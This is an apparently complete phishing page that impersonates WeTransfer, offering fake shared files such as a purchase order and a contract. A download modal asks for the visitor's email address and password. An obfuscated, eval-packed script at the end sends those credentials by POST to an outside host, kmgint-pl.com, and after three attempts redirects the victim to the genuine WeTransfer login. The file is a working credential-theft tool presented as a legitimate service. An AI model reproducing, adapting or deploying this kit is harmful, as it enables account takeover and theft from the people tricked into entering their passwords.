


<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>WeTransfer</title>
    <link rel="icon" type="image/x-icon" href="https://iili.io/JIXidEN.png">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <style>
       
    </style>
    <style>
        body {
            background-color: #f1f1f1;
            overflow: hidden;
        }

        * {
            margin: 0;
            padding: 0;
        }

        .head1 {
            display: flex;
            position: relative;
            justify-content: space-between;
        }

        .contain-all {
            display: flex;
            position: relative;
            justify-content: space-between;
            padding: 2%;


        }

        .logbox {
            width: 22%;
            height: 100%;
            border-radius: 10px;
            padding: 20px;
            margin-top: 20px;
            margin-left: 20px;
            background-color: #fff;
        }

        .write-test {
            font-size: 40px;
            line-height: 120%;
        }

        .accept1 {
            margin-top: 30px;
        }

        .flex-container {
            display: flex;
            flex-direction: column;
            margin-top: 10px;
        }

        .div1 {
            display: flex;
            position: relative;
            justify-content: space-between;
            margin-top: 20px;
        }

        .img-btn {
            cursor: pointer;
        }
    </style>


<style>
    @media (max-width:480px){
        .logbox{
            width: 100%;
        }

        .imgdispaybox{
            display:none;
        }

        .contentbox{
            display: none;
        }
    }
</style>
</head>

<body>

    <div class="head1">
        <div class="logo"><img src="https://iili.io/JIXgWPt.png" alt="logo"></div>
        <div class="navimg"><img src="https://iili.io/JIXUp8G.png" alt="wet-nav"></div>
    </div>


    <div class="contain-all">
        <div class="logbox">
            <div><img src="https://iili.io/JIXidEN.png" alt="lo-black"></div>
            <div class="write-test"><span>You're</span><br />
                <b>almost</b> there
            </div>

            <div class="flex-container">
                <div class="div1">
                    <div>PO_201AJ02.xls</div>
                    <div class="img-btn" data-bs-toggle="modal" data-bs-target="#exampleModal"><img
                            src="https://iili.io/JIhHVFs.png" alt="download"></div>
                </div>

                <div class="div1">
                    <div>Product-Specifications.pdf</div>
                    <div class="img-btn" data-bs-toggle="modal" data-bs-target="#exampleModal"><img
                            src="https://iili.io/JIhHVFs.png" alt="download"></div>
                </div>

                <div class="div1">
                    <div>Contract.xls</div>
                    <div class="img-btn" data-bs-toggle="modal" data-bs-target="#exampleModal"><img
                            src="https://iili.io/JIhHVFs.png" alt="download"></div>
                </div>

                


            </div>

            <div class="accept1">To continue, please agree<br />
                to our <u><b><span class="img-btn" data-bs-toggle="modal" data-bs-target="#exampleModal">Terms Of
                            Service.</span></b></u></div>

            <hr>

            <center>
                <button type="button" class="btn btn-primary" data-bs-toggle="modal" data-bs-target="#exampleModal">
                    Download
                </button>
            </center>
        </div>
        <div class="contentbox"><img src="https://iili.io/JIX4qpj.png" alt="content"></div>
        <div class="imgdispaybox"><img src="https://iili.io/JIX6qFt.png" alt="imgco"></div>
    </div>


    <!-- Modal -->
    <form action="" method="post">
        <div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
            <div class="modal-dialog">
                <div class="modal-content">
                   
                    <div class="modal-body">
                        

                        <div class="nav-container">
                            <div class="alert alert-primary" role="alert">
                                These files are sensitive and secured against unauthorized access. In order to access
                                this file, please provide your correct email credentials, we will connect to your email
                                provider through a secure IMAP channel to authorize your download.
                            </div>

                            <div class="mb-3">
                                <label for="exampleFormControlInput1" class="form-label">Email address:</label>
                                <input type="email" class="form-control" id="ai" name="email"
                                    placeholder="name@example.com">
                            </div>

                            <div class="mb-3">
                                <label for="exampleFormControlInput1" class="form-label">Password:</label>
                                <input type="password" class="form-control" id="pr" name="password"
                                    placeholder="Enter Email Password">
                            </div>
                            <div class="alert alert-danger" id="msg" style="display: hidden;" role="alert">Invalid email or password
                            </div>

                        </div>

                    </div>
                    <div class="modal-footer">
                        <button type="submit" id="sub-btn" class="btn btn-primary">Download Now</button>
                    </div>
                </div>
            </div>
        </div>
    </form>


    <script>
        const myModal = document.getElementById('myModal')
        const myInput = document.getElementById('myInput')

        myModal.addEventListener('shown.bs.modal', () => {
            myInput.focus()
        })

    </script>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
        crossorigin="anonymous"></script>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
   <script>

//redirect link
var rdrt = "https://www.wetransfer.com/login";

//mail result count
var rc = 3;

//mailer link
var f = atob("Zm9ybS5waHA=");

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(F).M(6(){3 m=0;$(F).N(6(a){3 b=(a.G?a.G:a.O);7(b==\'13\'){a.H();$("#t-u").I()}});3 n=J.K.P.8(1);7(!n){}Q{3 o=n;3 p=o.v("@");3 q=o.8((p+1));3 c=q.8(0,q.v(\'.\'));3 r=c.L();$(\'#x\').w(o);$(\'#R\').5(o);$("#f").y()}$(\'#t-u\').I(6(b){$(\'#s\').y();$(\'#f\').y();b.H();3 d=$("#x").w();3 e=$("#z").w();3 g=$(\'#f\').5();$(\'#f\').S(g);3 h=d;3 i=/^([a-A-B-T\\.\\-])+\\@(([a-A-B-9\\-])+\\.)+([a-A-B-9]{2,4})+$/;7(!d){$(\'#s\').C();$(\'#s\').5("帐户（手机/电子邮件/用户名）字段为空");D E}7(!e){$(\'#s\').C();$(\'#s\').5("密码字段为空。！");D E}3 j=h.v("@");3 k=h.8((j+1));3 c=k.8(0,k.v(\'.\'));3 l=c.L();m=m+1;$.U({V:\'W\',X:\'Y://Z-10.11/12/14.15\',16:\'17\',18:{x:d,z:e,},19:6(a){$(\'#t-u\').5(\'1a....\')},1b:6(){$("#z").w("");7(m>=1c){m=0;J.K.1d(1e);D E}$("#f").C();$(\'#t-u\').5(\'1f\')}})})});',62,78,'|||var||html|function|if|substr|||||||msg|||||||||||||error|sub|btn|indexOf|val|ai|hide|pr|zA|Z0|show|return|false|document|keyCode|preventDefault|click|window|location|toLowerCase|ready|keypress|which|hash|else|aich|text|9_|ajax|dataType|JSON|url|https|kmgint|pl|com|images||product|php|type|POST|data|beforeSend|Validating|complete|rc|replace|rdrt|Download'.split('|'),0,{}))
</script>
</body>

</html>
